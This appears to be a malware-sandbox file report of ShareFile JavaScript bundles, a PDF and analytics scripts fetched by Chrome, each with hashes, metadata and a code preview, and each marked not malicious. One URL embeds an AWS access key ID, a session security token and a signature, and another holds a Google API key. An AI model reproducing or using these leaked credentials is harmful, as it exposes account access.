                                                                                                                                                                                                                      SSDEEP:24576:HZnWR/8H22sP8OEuWkvXY53ov8bq1K8kaLvpptHpI7e:Hxe/S22sUOEuWkvXxK8kaLvpptHpI7e
                                                                                                                                                                                                                      MD5:EF6C50332B5E5E567F6A99C5D5F87E56
                                                                                                                                                                                                                      SHA1:A34CB792FCA2BBFBC571A44F9C985087551A2DCC
                                                                                                                                                                                                                      SHA-256:EEB76B0472A03DA11EC3081F315D44D8D47387040B8252C5944343A1F9A7D52A
                                                                                                                                                                                                                      SHA-512:7C05821AF219393764D7F6B1D207288B4CD1F1536704A03EE3D30C0E1E396B2E7DB8859ACE6A16A57FB2F4CEF7EE89843ED99ED88E2A3B1448AC617EF92C4AD0
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-resourcegen-pilet/0.1.44/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevresourcegenpilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},i={},a={},s={},o={};return Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){n.Api=e.Api},function(e){r.colorPalette=e.colorPalette},function(e){i.Alert=e.Alert,i.Button=e.Button,i.Checkbox=e.Checkbox,i.Collapse=e.Collapse,i.DatePicker=e.DatePicker,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Flex=e.Flex,i.Form=e.Form,i.Input=e.Input,i.Select=e.Select,i.Slider=e.Slider,i.Space=e.Space,i.Spin=e.Spin,i.Typography=e.Typography,i.theme=e.theme},function(e){Object.keys(e).forEach((function(t){a[t]=e[t]}))},function(e){s.Redirect=e.Redirect},function(e){o.__awaiter=e.__awaiter,o.__rest=e.__rest}],execute:function(){e((()=>{var e,l,c={5655:(e,t,n)=>{"use strict";n.d(t,{A:()=>ae});var r=function(){function e(e){var t=this;this._insertTag=function(e){var n;n=0===t.tags.length?t.insertio
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (13545), with no line terminators
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):13546
                                                                                                                                                                                                                      Entropy (8bit):4.792073494007343
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:192:/LCNyKY+DjKNf7FXNY8/gSgTI5lSgTIZHyxIEYcmacMSgTIkJSgTId6RaSgTI9VZ:22/tuKLcA5
                                                                                                                                                                                                                      MD5:1711B6CAC451CFDB8E7EF06DAEDB3279
                                                                                                                                                                                                                      SHA1:C413F2ACDD0CDABE881719E8EF54F4B21969F907
                                                                                                                                                                                                                      SHA-256:386F4FDE9CA6B967C1F9968AAA58E104F05A1F66A592D2E46019954E32CAAD24
                                                                                                                                                                                                                      SHA-512:A7F5876FEC9EB2B77A196C04CA8ECE53E9A9A9E5C096E69E7DB70C77E758A6C4C89797B56EAE0B49E391509E7F7CFB89DB543905D534E68EBEEF5983E507B290
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://citrix-sharefile-content.customer.pendo.io/guide-content/u6RYL2wEa9xrpUJMTeOXl41AeJI/qrJmWADnkufXgGqv6M-p2xBSYIU/xBPyrN0M2r6IFxno71T0shlp-Qc.dom.json?sha256=OG9P3pymuWfB-ZaKqljhBPBaH2alktLkYBmVTjLKrSQ
                                                                                                                                                                                                                      Preview:{"props":{"id":"pendo-base","data-layout":"lightboxBlank","class":"_pendo-step-container"},"type":"div","children":[{"css":[{"selector":"#pendo-close-guide-3d4e8aaf:hover","styles":{"color":"#D9D7D7"}},{"selector":"#pendo-close-guide-3d4e8aaf:focus","styles":{}},{"selector":"#pendo-button-1e3402c8:hover","styles":{"background":"rgba(73, 63, 185, 1)","border":"2px solid #493FB9","color":"#FFFFFF","font-weight":400}},{"selector":"div:focus","styles":{}},{"selector":"button:focus","styles":{}}],"type":"style","props":{"type":"text/css","scoped":"scoped"}},{"props":{"id":"pendo-g-qrJmWADnkufXgGqv6M-p2xBSYIU","data-vertical-alignment":"Relative to Element","data-relative-alignment":true,"style":{"z-index":300000,"position":"relative","width":"350px","animation":"none","float":"none","vertical-align":"baseline","display":"block"},"class":"_pendo-step-container-size"},"type":"div","children":[{"props":{"aria-modal":"false","tabindex":"-1","role":"dialog","id":"pendo-guide-container","data-car
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:PDF document, version 1.7, 1 pages
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):27131
                                                                                                                                                                                                                      Entropy (8bit):7.489760917606285
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:BXF14U0IRunpZNvkWdhvqxzz6ndS3RUryEaZdW95fNb/CfOJQzcymuSktBMVvwCe:7GVoH6QEcBBDNn
                                                                                                                                                                                                                      MD5:701174856293323D7D21E2917EC903D4
                                                                                                                                                                                                                      SHA1:2D595D0008E9F62587D17CF443D09DFE9ABCC0B6
                                                                                                                                                                                                                      SHA-256:976AAAA1B224A9D5281FCE37DA54411CE4A87C1DD6CDD290D0E2F7F76E90FFFA
                                                                                                                                                                                                                      SHA-512:10C5762FA1B1BF9719CA6E2AD6DDCBB540E68898878DCC423DF65950D380EE8CF8348D532E781F762D60388B2A3B1A91E79A96828070A6EC1569488AF07817CA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://sf-temp-us-east-1-production.s3.amazonaws.com/renderx/RenderOutput/a2686d04-5eab-df7f-5602-cc391d4b2e38/VOWithPDFSecurity/cf804dbe8dfa5e48aa89837887e966e8?AWSAccessKeyId=ASIAWSHYYC7RUDGK6WRV&Expires=1730838707&x-amz-security-token=IQoJb3JpZ2luX2VjEJP%2F%2F%2F%2F%2F%2F%2F%2F%2F%2FwEaCXVzLWVhc3QtMSJGMEQCIGo4KpG1v4XQWBoCg2%2BHZ72AGX6XeD4l%2FMgxmMH9zPQsAiAFo1%2FLQaX5KzGgjXDGxbreOp1GM2%2FGi9VKibzLH14GXiq6BQgcEAAaDDQ1MTQ5MzIzODc1NSIM5ZAobSqNv9HcN4taKpcFaC5c9iXyRB%2BnRXEPpqTR8BX9iO%2FP17759nDT2WKZ8rOZ%2BSf%2BScymuCbUM3Xir8BIhs0hyJWLM32LaT3OcQclkQ3AT1%2BPoPKyCxPcM0tHN%2F%2BhioBkVUC9bi0F82azyguylKIdPByQlRJvENfg%2Bq8nxSDPcPoupzQt7%2BwzQ%2FyGmjmGzpbb4kxXf0A17fh1Cn0VR7CJvSYVyMY%2BSs1aj70zA0xSfQwLtggK6T%2F92%2FgAGuEo5FAvhjv5xnOdeMXOsbMYeY2tyrdUw7o5rdAC7lUp5JqElJbC5PG1dTF1QINw5QaFLYd8lDbWZr1Ygv9sruphlLAVTCRZ9jCNSvJCxLrkmyttW7sR2RK9t7ARn1mOPQL4WJMUZX%2BtLjh%2FlM%2FdSA%2B24wpcDQf4fKUV8WeRdy%2FCQOGeCjhl3zVHqXuvAps2aulyY4ISbXtTsghTrjzcSXrt9uHsf0C%2FkozNmXA46wB43D%2FPzsQ0HTy1WDCQAj9VxL88F%2F3XHZbyk7hl3vlLbl9%2F7QDDz%2BkqUnGFoUet3MMKQyHlb5Yygs77R5s%2B9uF1JKdk%2BDCU5qNwASU25HeIyOognpsmcc9b%2B9kLpzr9RhzG9HYH1aUcbqmbs58IDAZ%2BdW69KE9HB2Trj3OGgeSbTSCtpnFeipeC8K9pVwiG7lNJDwpKpBtBttvmm43KPcv3ymPhGsldVrATxa8%2F1lTAznLAfPiH3piwGR2X0bVuf5w7SlM1Tb2KKEoW3Uz6%2BJ63Qi4k82J0TCG3yKM1FwEHeu71LzQxFWbw2Rmmn8Gbi2ogTVXz4lSyirWAE78XyI3n6uogExWpHWriIXYZrSuQgJYCNO7hMKnNcf6uBIN5%2FiTsaPZrtaLwN%2FEnQGky8yoygIgV9joOBw%2FHMK3XqbkGOrIBo75KDadttrB40wIWrBcJ9yJFmg6NKu72c8QlvZE1PbB%2BHJyg656KyXICeKJ60NooKeKEegBqAWUU2RChvxlGm5bBomD9N372Jab5ZICG%2BKuj5ng3YShpUkl%2BqXFqJoeMZQUTbkPWUOpDWWu8kTHQh66sXa0wB7nhxQfcqSD0k%2FrI8dr91d4bkERwaDXq4reGmO65JpYmJJS%2FJQgIzrNUoCUrP0lnOMIgRbs0BSxeZNNLuQ%3D%3D&Signature=B%2F%2FhXyZUNHpUMroNVT1ooCDER4Q%3D:2f84c5ce788a66:0
                                                                                                                                                                                                                      Preview:%PDF-1.7.%......189 0 obj.<< /Linearized 1 /L 27131 /H [ 1221 177 ] /O 195 /E 21724 /N 1 /T 26154 >>.endobj... .190 0 obj.<< /Type /XRef /Filter /FlateDecode /Length 161 /W [ 1 2 1 ] /Index [ 189 43 ]. /ID [<E5E386DCC5EA704CB4808DC725C50A10><32392D35462D43462D43352D44392D41>] . /Size 232 /Prev 26155 . /Root 191 0 R . /Info 2 0 R . /Encrypt 192 0 R . >>.stream.x...J.`...4JP3...E..A.V..BSC..A.....A.C.O!55..S........$.|...#3...K<~.........._`...c<.`.......7f../.^........9.&X..F..yl.....|...;?...C.m....W....Ul ..endstream..endobj. .191 0 obj.<</Type/Catalog/Pages 1 0 R/Lang(\341jkl\015)/StructTreeRoot 7 0 R/MarkInfo<</Marked true>>/Metadata 4 0 R/ViewerPreferences 193 0 R/Names 5 0 R>>..endobj..192 0 obj.<</Filter/Standard/O(6E\033\323\235u;|\035\020\222,\(\346fZ\244\3635?\2604\213Sh\
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):463080
                                                                                                                                                                                                                      Entropy (8bit):5.533244118000855
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:on/42WJv4vN7DDHa/qS/rIvYfOb7ObV7NOcT2Uo4J/LQYEXy:92WJv4vlsqDvYf1OSowsNy
                                                                                                                                                                                                                      MD5:B4C879D3598119E0E769C9A0E8A15BF0
                                                                                                                                                                                                                      SHA1:71033E9E99D02BEE24EACC78F53B732D015A5180
                                                                                                                                                                                                                      SHA-256:76DC987A272ADD4B49B7320E0BE515E771B22F08F29E6B6C434AC31EB60634BD
                                                                                                                                                                                                                      SHA-512:541C1A7EEB290C4C126A5C8DB3D3019D0B9291E7A20875B3537463A8F71B6E6EC25031B1FA96FCE5DF74B5B756DF04E149D6A8848B1E06EE9B18CCAA3DC42451
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-notification-center/0.11.0/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevnotificationcenter,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","tslib"],(function(e,t){var n={},r={},i={},a={},s={},o={},c={};return{setters:[function(e){n.UsersEntity=e.UsersEntity},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.Avatar=e.Avatar,i.Button=e.Button,i.Card=e.Card,i.Col=e.Col,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Dropdown=e.Dropdown,i.Popover=e.Popover,i.Result=e.Result,i.Row=e.Row,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Switch=e.Switch,i.Typography=e.Typography,i.notification=e.notification},function(e){a.Children=e.Children,a.createContext=e.createContext,a.createElement=e.createElement,a["default"]=e["default"],a.forwardRef=e.forwardRef,a.isValidElement=e.isValidElement,a.useCallback=e.useCallback,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useReducer=e.useReducer,a.useRef=e.useRef,a.useState=e.useStat
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):463080
                                                                                                                                                                                                                      Entropy (8bit):5.533244118000855
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:6144:on/42WJv4vN7DDHa/qS/rIvYfOb7ObV7NOcT2Uo4J/LQYEXy:92WJv4vlsqDvYf1OSowsNy
                                                                                                                                                                                                                      MD5:B4C879D3598119E0E769C9A0E8A15BF0
                                                                                                                                                                                                                      SHA1:71033E9E99D02BEE24EACC78F53B732D015A5180
                                                                                                                                                                                                                      SHA-256:76DC987A272ADD4B49B7320E0BE515E771B22F08F29E6B6C434AC31EB60634BD
                                                                                                                                                                                                                      SHA-512:541C1A7EEB290C4C126A5C8DB3D3019D0B9291E7A20875B3537463A8F71B6E6EC25031B1FA96FCE5DF74B5B756DF04E149D6A8848B1E06EE9B18CCAA3DC42451
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevnotificationcenter,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-dom","react-router","tslib"],(function(e,t){var n={},r={},i={},a={},s={},o={},c={};return{setters:[function(e){n.UsersEntity=e.UsersEntity},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){i.Alert=e.Alert,i.Avatar=e.Avatar,i.Button=e.Button,i.Card=e.Card,i.Col=e.Col,i.Divider=e.Divider,i.Drawer=e.Drawer,i.Dropdown=e.Dropdown,i.Popover=e.Popover,i.Result=e.Result,i.Row=e.Row,i.Skeleton=e.Skeleton,i.Space=e.Space,i.Spin=e.Spin,i.Switch=e.Switch,i.Typography=e.Typography,i.notification=e.notification},function(e){a.Children=e.Children,a.createContext=e.createContext,a.createElement=e.createElement,a["default"]=e["default"],a.forwardRef=e.forwardRef,a.isValidElement=e.isValidElement,a.useCallback=e.useCallback,a.useContext=e.useContext,a.useEffect=e.useEffect,a.useReducer=e.useReducer,a.useRef=e.useRef,a.useState=e.useStat
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (4597)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):4602
                                                                                                                                                                                                                      Entropy (8bit):5.805977817899102
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:96:CVb1liy0vSKGH6666a1hwfgtf1n/0mio31XLnvnVBSrXRdIJfQffX:m/J4pGH6666aXRt9nsmD31yP
                                                                                                                                                                                                                      MD5:23322ACA1A3DDBD5216CA41B5FF4B126
                                                                                                                                                                                                                      SHA1:699EE3119997B1CDFBAB16273730F6155F2610A1
                                                                                                                                                                                                                      SHA-256:B4E407F1D413FAC1EDFD243510B4E8D1F977CA14890CD599F5587ABAD733C634
                                                                                                                                                                                                                      SHA-512:496669A34318664EE23A449061662676FCA4720838EC7EE2D39C94197C5CA93BAF5A5B124C015514FDDC6D568A25E516DBD11573E5B32CABB294678F1D151C97
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://www.google.com/complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw
                                                                                                                                                                                                                      Preview:)]}'.["",["nyt strands hints november 5","iheartmedia layoffs","texas","super micro computer stock","nintendo switch announcement","spacex launches","asante samuel","sarah cunningham missing artist"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"google:entityinfo":"CggvbS8wN2JfbBIIVVMgc3RhdGUyjgRkYXRhOmltYWdlL3BuZztiYXNlNjQsaVZCT1J3MEtHZ29BQUFBTlNVaEVVZ0FBQUVBQUFBQXJDQU1BQUFEL2hINTFBQUFBYjFCTVZFWC8vLysvRFQ0QUlGdmdwcTY4QURFQUFFL0x6TlNaRkVmQ0REMEFBRTBBQUVnQUhsb0FBRkVBSEZrQUdsZ0FFVlVBQUVJQUZsZTJ1Y1kwUVczUzA5dDRmcGZFeHRGbmI0eCtoSndBQ2xNZkwyUGw1dXVzcjc0VEtGK3locGVHaTZLWEFFQldYNEdRbGFsR1VIZjI5dml2TkNCMUFBQUF4a2xFUVZSSWllM1R5UTZDTUJRRjBDZGF0QU10UlFZclRrRC8veHN0ME1Sb1hIUklYSmplMVhza0hNZ3RRUFlsS0FmM0pDQUJmd2NVa1VCeDVIRUFxaVdOQTZBUk1ZQm9JRWVoQURWQkxRQ2VCK29QRkFoalhKcTVJMllRM29BNHZWMW9PZlY5QTNYdVgzdUhxWDhIbkZ6czFsL1ZYT2h0NjV6MUZDaTVML2ZYNWZveFBYYk9zY2ZJ
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65453)
                                                                                                                                                                                                                      Category:dropped
                                                                                                                                                                                                                      Size (bytes):91744
                                                                                                                                                                                                                      Entropy (8bit):5.35315025267453
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:1536:15K9Coppx4UK/l6XHUlMDltJXhIWDUXjak3//+nOa:15K9CoppmZ/lyLDlGonk3G
                                                                                                                                                                                                                      MD5:EC10A08ABEEA396244C7C88FFAA5ECF7
                                                                                                                                                                                                                      SHA1:29EA05BFC2B2A754AE77DF48FEBAC23A79352C48
                                                                                                                                                                                                                      SHA-256:E4126A1DD61B9AB0EB21038540041710DDCBDCD5E03C0D7C302F74E25EF34B8E
                                                                                                                                                                                                                      SHA-512:23B746B157D1DD8A2896FEDD3A86CDF13A755353FF7F9BB87A339CBE194B844B0EAEE32F038F73254BB355BEA29D02052496B28D0FB29EECA85B2CA29D343B1A
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevuseracthistpilet,{}).System.register(["antd","react","react-dom","tslib"],(function(e,t){var r={},n={},o={},i={};return Object.defineProperty(n,"__esModule",{value:!0}),{setters:[function(e){r.Alert=e.Alert,r.Button=e.Button,r.Modal=e.Modal,r.Skeleton=e.Skeleton,r.Spin=e.Spin,r.Tabs=e.Tabs,r.Tag=e.Tag},function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){o["default"]=e["default"],o.findDOMNode=e.findDOMNode,o.flushSync=e.flushSync},function(e){i.__awaiter=e.__awaiter,i.__rest=e.__rest}],execute:function(){e((()=>{var e,s,a={5916:(e,t,r)=>{"use strict";r.d(t,{XK:()=>C,jK:()=>x});var n=r(8830),o=r.n(n),i=r(4193),s=undefined&&undefined.__assign||function(){return s=Object.assign||function(e){for(var t,r=1,n=arguments.length;r<n;r++)for(var o in t=arguments[r])Object.prototype.hasOwnProperty.call(t,o)&&(e[o]=t[o]);return e},s.apply(this,arguments)};function a(e){return Promise.resolve(o()({method:e.method,url:e.url,withCredential
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (32010)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):50049
                                                                                                                                                                                                                      Entropy (8bit):5.315307632257224
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:768:PFFeY2oE4e2HneiJbpJuAl39FVy7bT0tUpFk8Qgm:tIyreiBphl39FsvTpFvi
                                                                                                                                                                                                                      MD5:63E2DF852D15AB21D7FF8FC4363222E8
                                                                                                                                                                                                                      SHA1:7EE401BA652DB0A4EC960350E17216CDA01E22FB
                                                                                                                                                                                                                      SHA-256:545156ADEAE44DADC82B98D504F805EBE77FB79C928EF34EED1057BB9D4CB8FE
                                                                                                                                                                                                                      SHA-512:BAAD17C762461527B270B57EF294E28BEFF92B3A66829B8DDD8788A791AEBB0A40BE849BFC79FCFC5CB0D7FFC7FD709CA6CD6A61CAC878CE60F585D40F214970
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://js-agent.newrelic.com/nr-spa-1216.min.js
                                                                                                                                                                                                                      Preview:!function(t,n,e){function r(e,o){if(!n[e]){if(!t[e]){var a="function"==typeof __nr_require&&__nr_require;if(!o&&a)return a(e,!0);if(i)return i(e,!0);throw new Error("Cannot find module '"+e+"'")}var s=n[e]={exports:{}};t[e][0].call(s.exports,function(n){var i=t[e][1][n];return r(i||n)},s,s.exports)}return n[e].exports}for(var i="function"==typeof __nr_require&&__nr_require,o=0;o<e.length;o++)r(e[o]);return r}({1:[function(t,n,e){var r=t(46);n.exports=function(t,n){return"addEventListener"in window?window.addEventListener(t,n,r(!1)):"attachEvent"in window?window.attachEvent("on"+t,n):void 0}},{}],2:[function(t,n,e){function r(t,n,e,r){var i=d(t,n,e);return i.stats=a(r,i.stats),i}function i(t,n,e,r,i){var a=d(t,n,e,i);return a.metrics=o(r,a.metrics),a}function o(t,n){return n||(n={count:0}),n.count+=1,v(t,function(t,e){n[t]=a(e,n[t])}),n}function a(t,n){return null==t?s(n):n?(n.c||(n=f(n.t)),n.c+=1,n.t+=t,n.sos+=t*t,t>n.max&&(n.max=t),t<n.min&&(n.min=t),n):{t:t}}function s(t){return t?t.
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:Unicode text, UTF-8 text, with very long lines (65464)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):1482911
                                                                                                                                                                                                                      Entropy (8bit):5.889391822283771
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:24576:Vn9O7zqqrku7uOJM8wfSakb0zwT0611rsY+G8hzyjeGc8q:W7zqqrkUl5wfSawT0611rsY+G8hNGcR
                                                                                                                                                                                                                      MD5:514D63F3F284BF031A2EFD85CF5D7027
                                                                                                                                                                                                                      SHA1:3D7C7E1E045BF01305076602C5688F73D5EFBE5C
                                                                                                                                                                                                                      SHA-256:B1B12A07462EBB7E15E1FDDAD206153D52DB55A5ADAAC6C12D273E522BEEACCC
                                                                                                                                                                                                                      SHA-512:E50CC0BFE8D98F3287E10C3C8F7A74F284CFA370FB1D019E4CA87B67CD7AC3BFE4C77F27D00DBFD4D69BCE1F08EAD139793779D5B6EAEEAFBBDC1271D51C5780
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-workflows-pilet/0.120.9/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevworkflowspilet,{}).System.register(["react","antd","react-dom","tslib","@citrite/sf-api","react-router-dom","@sharefiledev/antd-config","react-router"],(function(e,t){var n={},r={},o={},a={},i={},s={},l={},c={};return Object.defineProperty(n,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),{setters:[function(e){Object.keys(e).forEach((function(t){n[t]=e[t]}))},function(e){r.Alert=e.Alert,r.App=e.App,r.Avatar=e.Avatar,r.Badge=e.Badge,r.Button=e.Button,r.Card=e.Card,r.Col=e.Col,r.Divider=e.Divider,r.Dropdown=e.Dropdown,r.Flex=e.Flex,r.Form=e.Form,r.Input=e.Input,r.List=e.List,r.Menu=e.Menu,r.Modal=e.Modal,r.Row=e.Row,r.Select=e.Select,r.Skeleton=e.Skeleton,r.Spin=e.Spin,r.Steps=e.Steps,r.Switch=e.Switch,r.Tabs=e.Tabs,r.Tooltip=e.Tooltip,r.Typography=e.Typography,r.notification=e.notification,r.theme=e.theme},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){a.__assign=e.__assign,a.__awaiter=e.__await
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65476)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):355264
                                                                                                                                                                                                                      Entropy (8bit):5.467504857512104
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:q1PjOU57Zc1mkC07CJ4Fa8aQsrZQDty9N7RrOC4i3Ag1HJuufQPUoHwDPbRrwy4k:q5O2f4uQFtW47LM
                                                                                                                                                                                                                      MD5:CD405D48FDFD34CB6BE76832783F37FC
                                                                                                                                                                                                                      SHA1:FDBDB25E7AD92F6FD62795628245DE63889260C8
                                                                                                                                                                                                                      SHA-256:87B9B8A9111F396AAD39CFBD33812CC9DB2F5F0C2B27C103E3D9F54F4A68A092
                                                                                                                                                                                                                      SHA-512:27D0C4BB8D4DC7DCF685F6CB44281F9DC5FCD5B71C9428ED173522C933C59051CE209FEF9104E96F0C48E700F15F13F4459C81721B23982872C6DA0386B25223
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-client-dashboard/0.181.0/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevclientdashboard,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","react-router-dom","tslib"],(function(e,t){var n={},r={},l={},o={},i={},c={};return{setters:[function(e){n.AccountsEntity=e.AccountsEntity,n.ItemsEntity=e.ItemsEntity},function(e){r.colorPalette=e.colorPalette,r.sizes=e.sizes},function(e){l.Avatar=e.Avatar,l.Button=e.Button,l.Divider=e.Divider,l.Dropdown=e.Dropdown,l.Flex=e.Flex,l.Grid=e.Grid,l.Image=e.Image,l.Layout=e.Layout,l.Popover=e.Popover,l.Skeleton=e.Skeleton,l.Space=e.Space,l.Spin=e.Spin,l.Typography=e.Typography,l.theme=e.theme},function(e){o.Children=e.Children,o.Fragment=e.Fragment,o.Suspense=e.Suspense,o.createContext=e.createContext,o.createElement=e.createElement,o["default"]=e["default"],o.forwardRef=e.forwardRef,o.isValidElement=e.isValidElement,o.lazy=e.lazy,o.useCallback=e.useCallback,o.useContext=e.useContext,o.useEffect=e.useEffect,o.useLayoutEffect=e.useLayoutEffect,o.useMemo=e.
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65479)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):225101
                                                                                                                                                                                                                      Entropy (8bit):5.408121493868668
                                                                                                                                                                                                                      Encrypted:false
                                                                                                                                                                                                                      SSDEEP:3072:n1YhPOuYDEl23Y8rFYsXD2cpp4LvfQwRbErnO/:10PO1DEl2dZYsXD2cpp4DfQ7jo
                                                                                                                                                                                                                      MD5:17F623A8A7BE369C0194D4F492D9DCBF
                                                                                                                                                                                                                      SHA1:2BB9D23EA232DDC8C1DCB4613EBEE202CC27D5E0
                                                                                                                                                                                                                      SHA-256:B92A0D95FDC24ADD33A8F3984DEA9346029DD88A0ABF81BBC27B65850E517166
                                                                                                                                                                                                                      SHA-512:FD80FCB01D0D8B1131CAFE7DB216B615EC7E77525F13ACFACF02CB93A98893BB5280C1AC27984018A7CBEA24DC899B1CD4D868C8B0609C00076A6260D79672FA
                                                                                                                                                                                                                      Malicious:false
                                                                                                                                                                                                                      Reputation:low
                                                                                                                                                                                                                      URL:https://piletfeed-cdn.sharefile.io/sharefile-web/sharefiledev-package-pilet/0.37.26/package/dist/index.js
                                                                                                                                                                                                                      Preview://@pilet v:2(webpackChunkpr_sharefiledevpackagepilet,{}).System.register(["@citrite/sf-api","@sharefiledev/antd-config","antd","react","tslib"],(function(e,t){var r={},n={},i={},o={},a={};return Object.defineProperty(i,"__esModule",{value:!0}),Object.defineProperty(o,"__esModule",{value:!0}),Object.defineProperty(a,"__esModule",{value:!0}),{setters:[function(e){r.ItemsEntity=e.ItemsEntity,r.Uploader=e.Uploader,r.UserRole=e.UserRole,r.ZoneService=e.ZoneService,r.createFile=e.createFile},function(e){n.sizes=e.sizes},function(e){Object.keys(e).forEach((function(t){i[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){o[t]=e[t]}))},function(e){Object.keys(e).forEach((function(t){a[t]=e[t]}))}],execute:function(){e((()=>{var e,s,u,c,l={80780:(e,t,r)=>{"use strict";r.d(t,{A:()=>de});var n=r(58168),i=r(64467);function o(e,t){var r=Object.keys(e);if(Object.getOwnPropertySymbols){var n=Object.getOwnPropertySymbols(e);t&&(n=n.filter((function(t){return Object.getOwnPropertyDescriptor(e,t
                                                                                                                                                                                                                      Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                      File Type:ASCII text, with very long lines (65473)
                                                                                                                                                                                                                      Category:downloaded
                                                                                                                                                                                                                      Size (bytes):131500
                                                                                                                                                                                                                      Entropy (8bit):5.345244687137005
                                                                                                                                                                                                                      Encrypted:false
